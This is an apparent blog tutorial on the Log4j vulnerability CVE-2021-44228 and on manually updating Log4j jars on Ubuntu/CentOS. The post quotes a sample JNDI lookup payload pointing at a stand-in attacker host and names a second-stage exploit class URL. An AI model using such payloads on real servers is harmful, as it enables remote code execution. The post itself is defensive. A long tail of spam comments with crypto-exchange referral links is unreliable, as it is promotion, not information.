If you are using Log4j on your Ubuntu or Centos server you are required to upgrade to the latest version 2.18.0 or later to avoid any risk of attack.
What is log4j
Apache Log4j is a Java-based logging platform for analyzing web servers and individual application log files.
While not included by default in a standard apache LAMP stack, the software is widely used in businesses, eCommerce platforms, and games such as Minecraft, whose developers were quick to issue a patch.
Log4j exploits entail passing a string containing the substitution “$ [jndi: LDAP: /attacker.com/a]”, after which Log4j2 sends an LDAP request to the attacker website for the path to the Java class. By returning a path to their server, attackers can gain access to the operating system.
For example, using a specially crafted Java class e.g http://second-stage.example.com/Exploit.class the log4j exploit can be loaded and executed with the current application’s rights, allowing remote code execution. The vulnerability has been identified as CVE-2021-44228.
While Apache quickly released Log4j 2.15.0 with the fix that resolves vulnerable Log4j, many businesses are yet to update facing an attack that is described as being very simple to implement.
Is log4 1.x vulnerable?
Given the severity of the current Log4j vulnerability, it would be prudent to exercise an abundance of caution and assume that all versions prior to 2.15 are potentially vulnerable and should be patched or updated.
According to apache “Log4j 1.x has reached the end of life and is no longer supported. Vulnerabilities reported after August 2015 against Log4j 1.x was not checked and will not be fixed. Users should upgrade to Log4j 2 to obtain security fixes.”
How To Fix Log4j vulnerability
If you are using Log4j on your Ubuntu server you are required to upgrade to the latest version 2.18.0 or later to avoid any risk of attack. Set the log4j2.formatMsgNoLookups system property to true or remove the JndiLookup class from the “classpath” in version 2.10 and later.
How To Update Log4j In Ubuntu/Centos.
Log4j package is distributed under the Apache Software License, a full-fledged open-source license certified by the open-source initiative.
The most recent log4j version, complete with source code, class files, and documentation, is available here.
To update log4j on your system, download the latest apache-log4j-x.x.x.tar.gz from the specified URL and follow the steps given below.
Step 1: Download and unzip
Download and unzip/untar the downloaded file as follows (The latest version at the time is apache-log4j-2.18.0):
code
~# wget https://dlcdn.apache.org/logging/log4j/2.18.0/apache-log4j-2.18.0-bin.tar.gz ~# gunzip apache-log4j-2.18.0-bin.tar.gz ~# tar -xvf apache-log4j-2.18.0-bin.tar apache-log4j-2.18.0-bin/RELEASE-NOTES.md apache-log4j-2.18.0-bin/LICENSE.txt apache-log4j-2.18.0-bin/NOTICE.txt apache-log4j-2.18.0-bin/log4j-api-2.18.0.jar apache-log4j-2.18.0-bin/log4j-api-2.18.0-sources.jar apache-log4j-2.18.0-bin/log4j-api-2.18.0-javadoc.jar apache-log4j-2.18.0-bin/log4j-core-2.18.0.jar .......................................
While untarring, it would create a directory hierarchy with the name apache-log4j-x.x.x.
Step 2: Optional
This step is optional and is dependent on the features of the log4j framework that you intend to use. If you already have the following packages installed on your machine, you are good to go; otherwise, you will need to install them in order for log4j to work.
JavaMail API: Log4j’s email-based logging requires the Java Mail API (mail.jar) to be installed on your machine.
JavaBeans Activation Framework: The Java Mail API will also require that you install the JavaBeans Activation Framework (activation.jar).
Java Message Service: Log4j’s JMS-compatible features will require you to install both JMS and Java Naming and Directory Interface JNDI.
XML Parser: Log4j requires a JAXP-compatible XML parser. Make sure you have Xerces.jar installed on your machine.
Step 3: Locate installed log4J jar files
Locate all log4Jjar files in your environment to find the current installation directory of log4J
code:
:~# find / -type f -name log4* /usr/local/apache-log4j-2.3.2-bin/log4j-taglib-2.3.2-sources.jar /usr/local/apache-log4j-2.3.2-bin/log4j-flume-ng-2.3.2.jar /usr/local/apache-log4j-2.3.2-bin/log4j-1.2-api-2.3.2.jar /usr/local/apache-log4j-2.3.2-bin/log4j-iostreams-2.3.2.jar /usr/local/apache-log4j-2.3.2-bin/log4j-core-2.3.2.jar ....................
Looking at the output we have log4j-core-2.3.2.jar and other jar files. The most important one is the core files.
Step 4: Replace old log4j files
Replace all the necessary files depending on your environment setup
code:
:~# cd apache-log4j-2.18.0-bin :~/apache-log4j-2.18.0-bin# ls | grep core log4j-core-2.18.0.jar log4j-core-2.18.0-javadoc.jar log4j-core-2.18.0-sources.jar log4j-core-2.18.0-tests.jar
Thank you for your sharing. I am worried that I lack creative ideas. It is your article that makes me full of hope. Thank you. But, I have a question, can you help me? https://www.binance.com/vi/register?ref=T7KCZASX
Can you be more specific about the content of your article? After reading it, I still have some doubts. Hope you can help me.
Your point of view caught my eye and was very interesting. Thanks. I have a question for you. https://www.binance.com/en/register?ref=FIHEGIZ8
I may need your help. I’ve been doing research on gate io recently, and I’ve tried a lot of different things. Later, I read your article, and I think your way of writing has given me some innovative ideas, thank you very much.
Thanks for shening. I read many of your blog posts, cool, your blog is very good. https://accounts.binance.com/en/register?ref=P9L9FQKY
This article opened my eyes, I can feel your mood, your thoughts, it seems very wonderful. I hope to see more articles like this. thanks for sharing.
Very nice post. I just stumbled upon your blog and wanted to say that I’ve really enjoyed browsing your blog posts. In any case I’ll be subscribing to your feed and I hope you write again soon!
Your article helped me a lot, is there any more related content? Thanks! https://www.binance.com/vi/register?ref=UM6SMJM3
Hello there, just became aware of your blog through Google, and found that it is truly informative. I am gonna watch out for brussels. I’ll be grateful if you continue this in future. Lots of people will be benefited from your writing. Cheers!
Good – I should definitely pronounce, impressed with your website. I had no trouble navigating through all tabs and related info ended up being truly easy to do to access. I recently found what I hoped for before you know it in the least. Reasonably unusual. Is likely to appreciate it for those who add forums or anything, website theme . a tones way for your customer to communicate. Nice task..
Your article helped me a lot, is there any more related content? Thanks! https://accounts.binance.com/el/register?ref=V2H9AFPY
With havin so much content and articles do you ever run into any problems of plagorism or copyright violation? My blog has a lot of exclusive content I’ve either created myself or outsourced but it looks like a lot of it is popping it up all over the web without my permission. Do you know any solutions to help prevent content from being stolen? I’d truly appreciate it.
I don’t think the title of your article matches the content lol. Just kidding, mainly because I had some doubts after reading the article. https://accounts.binance.com/pt-BR/register?ref=IJFGOAID
Heya i am for the first time here. I came across this board and I find It truly useful & it helped me out much. I hope to give something back and help others like you aided me.
Thanks for sharing. I read many of your blog posts, cool, your blog is very good. https://www.binance.info/vi/join?ref=V2H9AFPY
I don’t think the title of your article matches the content lol. Just kidding, mainly because I had some doubts after reading the article. https://www.binance.info/ph/join?ref=GJY4VW8W
Thank you for your sharing. I am worried that I lack creative ideas. It is your article that makes me full of hope. Thank you. But, I have a question, can you help me? https://www.binance.info/sk/join?ref=V3MG69RO
Great awesome issues here. I am very satisfied to look your post. Thank you so much and i am looking ahead to contact you. Will you kindly drop me a e-mail?
I’m not sure where you’re getting your info, but great topic. I needs to spend some time learning more or understanding more. Thanks for great information I was looking for this information for my mission.
What i don’t realize is actually how you’re not really much more well-liked than you may be now. You are so intelligent. You realize therefore significantly relating to this subject, produced me personally consider it from numerous varied angles. Its like women and men aren’t fascinated unless it is one thing to do with Lady gaga! Your own stuffs excellent. Always maintain it up!
Great post. I used to be checking constantly this weblog and I am inspired! Extremely helpful info specifically the closing part 🙂 I take care of such information much. I was looking for this certain information for a very long time. Thank you and good luck.
Hello.This post was really interesting, especially since I was searching for thoughts on this topic last Monday.
Thank you for your sharing. I am worried that I lack creative ideas. It is your article that makes me full of hope. Thank you. But, I have a question, can you help me?
I was very pleased to find this web-site.I wanted to thanks for your time for this wonderful read!! I definitely enjoying every little bit of it and I have you bookmarked to check out new stuff you blog post.
Wow! This could be one particular of the most beneficial blogs We have ever arrive across on this subject. Actually Excellent. I am also a specialist in this topic therefore I can understand your effort.
Pretty nice post. I just stumbled upon your blog and wished to say that I have really enjoyed surfing around your blog posts. In any case I’ll be subscribing to your feed and I hope you write again very soon!
Thank you, I have just been looking for information about this topic for ages and yours is the best I have discovered so far. But, what about the conclusion? Are you sure about the source?
What Is Exactly ZenCortex? ZenCortex is an optimal hearing function support
I like what you guys are usually up too. Such clever work and exposure! Keep up the superb works guys I’ve added you guys to blogroll.